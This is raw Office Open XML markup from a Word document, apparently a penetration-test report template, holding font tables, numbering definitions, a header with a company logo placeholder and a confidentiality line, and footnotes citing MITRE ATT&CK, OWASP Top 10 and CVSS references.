  <w16cid:commentId w16cid:paraId="69231E7A" w16cid:durableId="38991B8D"/>
  <w16cid:commentId w16cid:paraId="34038831" w16cid:durableId="35B862D6"/>
  <w16cid:commentId w16cid:paraId="48E215E0" w16cid:durableId="238E9D9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rsidR="0085413F" w:rsidRDefault="0085413F" w14:paraId="5E527C69" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="0085413F" w:rsidRDefault="0085413F" w14:paraId="5A111DD6" w14:textId="7777777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Noto Sans Symbols">
    <w:charset w:val="00"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="default"/>
    <w:embedRegular w:fontKey="{B438F9A8-E6CE-427A-B80F-9A1235AF2887}" r:id="rId1"/>
  </w:font>
  <w:font w:name="Courier New">
    <w:panose1 w:val="02070309020205020404"/>
    <w:charset w:val="00"/>
    <w:family w:val="modern"/>
    <w:pitch w:val="fixed"/>
    <w:sig w:usb0="E0002EFF" w:usb1="C0007843" w:usb2="00000009" w:usb3="00000000" w:csb0="000001FF" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="IBM Plex Sans">
    <w:panose1 w:val="020B0503050203000203"/>
    <w:charset w:val="00"/>
    <w:family w:val="swiss"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="A00002EF" w:usb1="5000207B" w:usb2="00000000" w:usb3="00000000" w:csb0="0000019F" w:csb1="00000000"/>
    <w:embedRegular w:fontKey="{4753AF06-69E0-46AF-ACBA-77332F553CCE}" r:id="rId2"/>
    <w:embedBold w:fontKey="{01899904-EACA-42A5-AB25-66D86B53A17F}" r:id="rId3"/>
    <w:embedItalic w:fontKey="{065ACCDA-4772-4D11-802B-091654792F1A}" r:id="rId4"/>
  </w:font>
  <w:font w:name="Yu Mincho">
    <w:altName w:val="游明朝"/>
    <w:panose1 w:val="02020400000000000000"/>
    <w:charset w:val="80"/>
    <w:family w:val="roman"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="800002E7" w:usb1="2AC7FCFF" w:usb2="00000012" w:usb3="00000000" w:csb0="0002009F" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="Liberation Sans">
    <w:panose1 w:val="00000000000000000000"/>
    <w:charset w:val="00"/>
    <w:family w:val="roman"/>
    <w:notTrueType/>
    <w:pitch w:val="default"/>
  </w:font>
  <w:font w:name="Noto Sans CJK SC">
    <w:panose1 w:val="00000000000000000000"/>
    <w:charset w:val="00"/>
    <w:family w:val="roman"/>
    <w:notTrueType/>
    <w:pitch w:val="default"/>
  </w:font>
  <w:font w:name="FreeSans">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embedRegular w:fontKey="{5C661285-4291-4274-BA8D-B3E55CBE246E}" r:id="rId5"/>
    <w:embedItalic w:fontKey="{3FD5BBE4-CCE7-48DC-87C8-2065ABF8193B}" r:id="rId6"/>
  </w:font>
  <w:font w:name="Yu Gothic Light">
    <w:altName w:val="游ゴシック Light"/>
    <w:panose1 w:val="020B0300000000000000"/>
    <w:charset w:val="80"/>
    <w:family w:val="swiss"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="E00002FF" w:usb1="2AC7FDFF" w:usb2="00000016" w:usb3="00000000" w:csb0="0002009F" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="Consolas">
    <w:panose1 w:val="020B0609020204030204"/>
    <w:charset w:val="00"/>
    <w:family w:val="modern"/>
    <w:pitch w:val="fixed"/>
    <w:sig w:usb0="E00006FF" w:usb1="0000FCFF" w:usb2="00000001" w:usb3="00000000" w:csb0="0000019F" w:csb1="00000000"/>
    <w:embedRegular w:fontKey="{DA2C91FD-BDA2-47E0-B25D-9F10A764096D}" r:id="rId7"/>
  </w:font>
  <w:font w:name="Microsoft Sans Serif">
    <w:panose1 w:val="020B0604020202020204"/>
    <w:charset w:val="00"/>
    <w:family w:val="swiss"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="E5002EFF" w:usb1="C000605B" w:usb2="00000029" w:usb3="00000000" w:csb0="000101FF" w:csb1="00000000"/>
    <w:embedRegular w:fontKey="{CA44612B-13C5-4CF8-81D0-A81CD6D2C65D}" r:id="rId8"/>
  </w:font>
  <w:font w:name="Calibri">
    <w:panose1 w:val="020F0502020204030204"/>
    <w:charset w:val="00"/>
    <w:family w:val="swiss"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="E4002EFF" w:usb1="C000247B" w:usb2="00000009" w:usb3="00000000" w:csb0="000001FF" w:csb1="00000000"/>
    <w:embedRegular w:fontKey="{E0A7C010-2C22-4E77-99E0-60FE978FF046}" r:id="rId9"/>
    <w:embedBold w:fontKey="{31A0F087-7687-4B23-BE05-57D6D4ABE96F}" r:id="rId10"/>
  </w:font>
  <w:font w:name="Georgia">
    <w:panose1 w:val="02040502050405020303"/>
    <w:charset w:val="00"/>
    <w:family w:val="roman"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="00000287" w:usb1="00000000" w:usb2="00000000" w:usb3="00000000" w:csb0="0000009F" w:csb1="00000000"/>
    <w:embedItalic w:fontKey="{C966B48A-78DD-48E1-B84E-FE24409E05CE}" r:id="rId11"/>
  </w:font>
  <w:font w:name="Arial">
    <w:panose1 w:val="020B0604020202020204"/>
    <w:charset w:val="00"/>
    <w:family w:val="swiss"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="E0002EFF" w:usb1="C000785B" w:usb2="00000009" w:usb3="00000000" w:csb0="000001FF" w:csb1="00000000"/>
  </w:font>
  <w:font xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:name="Symbol">
    <w:panose1 w:val="05050102010706020507"/>
    <w:charset w:val="02"/>
    <w:family w:val="roman"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="00000000" w:usb1="10000000" w:usb2="00000000" w:usb3="00000000" w:csb0="80000000" w:csb1="00000000"/>
  </w:font>
  <w:font xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:name="Wingdings">
    <w:panose1 w:val="05000000000000000000"/>
    <w:charset w:val="02"/>
    <w:family w:val="auto"/>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027506" w:rsidRDefault="00027506" w14:paraId="000001D5" w14:textId="77777777">
    <w:pPr>
      <w:pBdr>
        <w:top w:val="nil"/>
        <w:left w:val="nil"/>
        <w:bottom w:val="nil"/>
        <w:right w:val="nil"/>
        <w:between w:val="nil"/>
      </w:pBdr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4320"/>
        <w:tab w:val="right" w:pos="8640"/>
      </w:tabs>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:rPr>
        <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>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027506" w:rsidRDefault="0085413F" w14:paraId="000001D6" w14:textId="489DBA73">
    <w:pPr>
      <w:pBdr>
        <w:top w:val="nil"/>
        <w:left w:val="nil"/>
        <w:bottom w:val="nil"/>
        <w:right w:val="nil"/>
        <w:between w:val="nil"/>
      </w:pBdr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4320"/>
        <w:tab w:val="right" w:pos="8640"/>
      </w:tabs>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:jc w:val="right"/>
      <w:rPr>
        <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
        <w:color w:val="000000"/>
      </w:rPr>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
        <w:color w:val="000000"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
        <w:color w:val="000000"/>
      </w:rPr>
      <w:instrText>PAGE</w:instrText>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
        <w:color w:val="000000"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="00E22175">
      <w:rPr>
        <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
        <w:noProof/>
        <w:color w:val="000000"/>
      </w:rPr>
      <w:t>2</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
        <w:color w:val="000000"/>
      </w:rPr>
      <w:fldChar w:fldCharType="end"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
        <w:color w:val="000000"/>
      </w:rPr>
      <w:t xml:space="preserve"> / </w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
        <w:color w:val="000000"/>
      </w:rPr>
      <w:fldChar w:fldCharType="begin"/>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
        <w:color w:val="000000"/>
      </w:rPr>
      <w:instrText>NUMPAGES</w:instrText>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
        <w:color w:val="000000"/>
      </w:rPr>
      <w:fldChar w:fldCharType="separate"/>
    </w:r>
    <w:r w:rsidR="00E22175">
      <w:rPr>
        <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
        <w:noProof/>
        <w:color w:val="000000"/>
      </w:rPr>
      <w:t>3</w:t>
    </w:r>
    <w:r>
      <w:rPr>
        <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
        <w:color w:val="000000"/>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027506" w:rsidRDefault="00027506" w14:paraId="000001D7" w14:textId="77777777">
    <w:pPr>
      <w:pBdr>
        <w:top w:val="nil"/>
        <w:left w:val="nil"/>
        <w:bottom w:val="nil"/>
        <w:right w:val="nil"/>
        <w:between w:val="nil"/>
      </w:pBdr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4320"/>
        <w:tab w:val="right" w:pos="8640"/>
      </w:tabs>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:rPr>
        <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>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rsidR="0085413F" w:rsidRDefault="0085413F" w14:paraId="5B7579C6" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w:rsidR="0085413F" w:rsidRDefault="0085413F" w14:paraId="52B1CCAC" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:continuationSeparator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:id="1">
    <w:p w:rsidR="00027506" w:rsidRDefault="0085413F" w14:paraId="000001D8" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:footnoteRef/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> https://blogs.infoblox.com/wp-content/uploads/mitre-attack-1.png</w:t>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:id="2">
    <w:p w:rsidR="00027506" w:rsidRDefault="0085413F" w14:paraId="000001D9" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:footnoteRef/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> https://evalian.co.uk/wp-content/uploads/2022/04/OWASP-Top-10-Evalian-768x755.png </w:t>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:id="3">
    <w:p w:rsidR="00027506" w:rsidRDefault="0085413F" w14:paraId="000001DA" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:footnoteRef/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> https://www.first.org/cvss/v3.0/specification-document</w:t>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:id="4">
    <w:p w:rsidR="00027506" w:rsidRDefault="0085413F" w14:paraId="000001DB" w14:textId="77777777">
      <w:pPr>
        <w:spacing w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:footnoteRef/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> https://github.com/hmaverickadams/TCM-Security-Sample-Pentest-Report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027506" w:rsidRDefault="00027506" w14:paraId="000001D0" w14:textId="77777777">
    <w:pPr>
      <w:pBdr>
        <w:top w:val="nil"/>
        <w:left w:val="nil"/>
        <w:bottom w:val="nil"/>
        <w:right w:val="nil"/>
        <w:between w:val="nil"/>
      </w:pBdr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4320"/>
        <w:tab w:val="right" w:pos="8640"/>
      </w:tabs>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:rPr>
        <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>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027506" w:rsidP="0FB6339A" w:rsidRDefault="0FB6339A" w14:paraId="433D53F0" w14:textId="7F289C6E">
    <w:pPr>
      <w:pBdr>
        <w:top w:val="nil"/>
        <w:left w:val="nil"/>
        <w:bottom w:val="nil"/>
        <w:right w:val="nil"/>
        <w:between w:val="nil"/>
      </w:pBdr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4320"/>
        <w:tab w:val="right" w:pos="8640"/>
        <w:tab w:val="right" w:pos="6840"/>
      </w:tabs>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:rPr>
        <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
        <w:color w:val="000000" w:themeColor="text1"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidRPr="0FB6339A">
      <w:rPr>
        <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
        <w:color w:val="000000" w:themeColor="text1"/>
      </w:rPr>
      <w:t>{%company.logo_small}</w:t>
    </w:r>
  </w:p>
  <w:p w:rsidR="00027506" w:rsidP="0FB6339A" w:rsidRDefault="0FB6339A" w14:paraId="000001D1" w14:textId="771EFB60">
    <w:pPr>
      <w:pBdr>
        <w:top w:val="nil"/>
        <w:left w:val="nil"/>
        <w:bottom w:val="nil"/>
        <w:right w:val="nil"/>
        <w:between w:val="nil"/>
      </w:pBdr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4320"/>
        <w:tab w:val="right" w:pos="8640"/>
        <w:tab w:val="right" w:pos="6840"/>
      </w:tabs>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:jc w:val="center"/>
      <w:rPr>
        <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
        <w:color w:val="000000"/>
      </w:rPr>
    </w:pPr>
    <w:r w:rsidRPr="0FB6339A">
      <w:rPr>
        <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
        <w:color w:val="000000" w:themeColor="text1"/>
      </w:rPr>
      <w:t>CONFIDENTIAL -  DO NOT DISTRIBUTE</w:t>
    </w:r>
  </w:p>
  <w:p w:rsidR="00027506" w:rsidP="0FB6339A" w:rsidRDefault="00027506" w14:paraId="000001D2" w14:textId="77777777">
    <w:pPr>
      <w:pBdr>
        <w:top w:val="nil"/>
        <w:left w:val="nil"/>
        <w:bottom w:val="nil"/>
        <w:right w:val="nil"/>
        <w:between w:val="nil"/>
      </w:pBdr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4320"/>
        <w:tab w:val="right" w:pos="8640"/>
      </w:tabs>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:jc w:val="center"/>
      <w:rPr>
        <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>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027506" w:rsidRDefault="00027506" w14:paraId="000001D3" w14:textId="77777777">
    <w:pPr>
      <w:pBdr>
        <w:top w:val="nil"/>
        <w:left w:val="nil"/>
        <w:bottom w:val="nil"/>
        <w:right w:val="nil"/>
        <w:between w:val="nil"/>
      </w:pBdr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4320"/>
        <w:tab w:val="right" w:pos="8640"/>
      </w:tabs>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:jc w:val="right"/>
      <w:rPr>
        <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>
        <w:color w:val="000000"/>
      </w:rPr>
    </w:pPr>
  </w:p>
  <w:p w:rsidR="00027506" w:rsidRDefault="00027506" w14:paraId="000001D4" w14:textId="77777777">
    <w:pPr>
      <w:pBdr>
        <w:top w:val="nil"/>
        <w:left w:val="nil"/>
        <w:bottom w:val="nil"/>
        <w:right w:val="nil"/>
        <w:between w:val="nil"/>
      </w:pBdr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4320"/>
        <w:tab w:val="right" w:pos="8640"/>
      </w:tabs>
      <w:spacing w:line="240" w:lineRule="auto"/>
      <w:jc w:val="right"/>
      <w:rPr>
        <w:rFonts w:eastAsia="Calibri" w:cs="Calibri"/>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xmlns:w="http://schemas.openxmlformats.org/wordprocessingml/2006/main" w:abstractNumId="12">
    <w:nsid w:val="40c8227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w:abstractNumId="0" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="0BC81735"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="3"/>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1" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="102D352B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="747" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Noto Sans Symbols" w:hAnsi="Noto Sans Symbols" w:eastAsia="Noto Sans Symbols" w:cs="Noto Sans Symbols"/>
        <w:color w:val="44546A"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1467" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2187" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Noto Sans Symbols" w:hAnsi="Noto Sans Symbols" w:eastAsia="Noto Sans Symbols" w:cs="Noto Sans Symbols"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2907" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Noto Sans Symbols" w:hAnsi="Noto Sans Symbols" w:eastAsia="Noto Sans Symbols" w:cs="Noto Sans Symbols"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3627" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="4347" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Noto Sans Symbols" w:hAnsi="Noto Sans Symbols" w:eastAsia="Noto Sans Symbols" w:cs="Noto Sans Symbols"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5067" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Noto Sans Symbols" w:hAnsi="Noto Sans Symbols" w:eastAsia="Noto Sans Symbols" w:cs="Noto Sans Symbols"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="o"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5787" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:eastAsia="Courier New" w:cs="Courier New"/>
      </w:rPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="▪"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="6507" w:hanging="360"/>
      </w:pPr>
      <w:rPr>
        <w:rFonts w:ascii="Noto Sans Symbols" w:hAnsi="Noto Sans Symbols" w:eastAsia="Noto Sans Symbols" w:cs="Noto Sans Symbols"/>
      </w:rPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="1A0B447A"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="12"/>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3" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="2E011F54"/>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4" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="2F3C5F09"/>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5" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="36115DEE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>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473B56A0"/>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48B33491"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="bullet"/>
      <w:lvlText w:val="●"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val=""/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="0" w:firstLine="0"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="8" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="4EE02D0E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="7"/>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9" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="5A3B4010"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="10"/>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10" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="69540734"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>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7E2F20F1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FFFFFFFF"/>
    <w:lvl w:ilvl="0">
      <w:start w:val="5"/>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num w:numId="13">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="1" w16cid:durableId="2020814706">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="490564845">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="519900244">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="725493930">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1272132577">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1525486002">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1155754066">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1824540921">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1752314191">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="581839083">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="1886720934">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="898368202">
    <w:abstractNumId w:val="1"/>
  </w:num>
</w:numbering>
</file>

<file path=word/people.xml><?xml version="1.0" encoding="utf-8"?>
<w15:people xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" xmlns:w15="http://schemas.microsoft.com/office/word/2012/wordml" mc:Ignorable="w15">
  <w15:person w15:author="Alexander Tong">
    <w15:presenceInfo w15:providerId="Windows Live" w15:userId="1c6bd1202a306dc4"/>
  </w15:person>
  <w15:person w15:author="Guest User">
    <w15:presenceInfo w15:providerId="Windows Live" w15:userI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embedTrueTypeFonts/>
  <w:trackRevisions w:val="false"/>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27506"/>
    <w:rsid w:val="00027506"/>
    <w:rsid w:val="0013064A"/>
    <w:rsid w:val="001827D2"/>
    <w:rsid w:val="00352154"/>
    <w:rsid w:val="005E3015"/>
    <w:rsid w:val="0085413F"/>
    <w:rsid w:val="00E22175"/>
    <w:rsid w:val="0FB6339A"/>
    <w:rsid w:val="2FBCE143"/>
    <w:rsid w:val="5A74C9BE"/>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36"/>
    <o:shapelayout v:ext="edit">
      <o:idmap v:ext="edit" data="1"/>
    </o:shapelayout>
  </w:shapeDefaults>
  <w:decimalSymbol w:val="."/>
  <w:listSeparator w:val=","/>
  <w14:docId w14:val="1F53AFA5"/>
  <w15:docId w15:val="{9D7DB031-B150-4C57-A625-665F446676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IBM Plex Sans" w:hAnsi="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:cs="IBM Plex Sans"/>
        <w:color w:val="374151"/>
        <w:sz w:val="22"/>
        <w:szCs w:val="22"/>
        <w:lang w:val="fr-CA" w:eastAsia="ja-JP" w:bidi="ar-SA"/>
      </w:rPr>
    </w:rPrDefault>
    <w:pPrDefault>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="none" w:color="D9D9E3" w:sz="0" w:space="0"/>
          <w:left w:val="none" w:color="D9D9E3" w:sz="0" w:space="0"/>
          <w:bottom w:val="none" w:color="D9D9E3" w:sz="0" w:space="0"/>
          <w:right w:val="none" w:color="D9D9E3" w:sz="0" w:space="0"/>
          <w:between w:val="none" w:color="D9D9E3" w:sz="0" w:space="0"/>
        </w:pBd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FB6339A"/>
    <w:pPr>
      <w:ind w:right="465"/>
    </w:pPr>
    <w:rPr>
      <w:lang w:val="en-US" w:eastAsia="en-US" w:bidi="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:uiPriority w:val="9"/>
    <w:name w:val="heading 1"/>
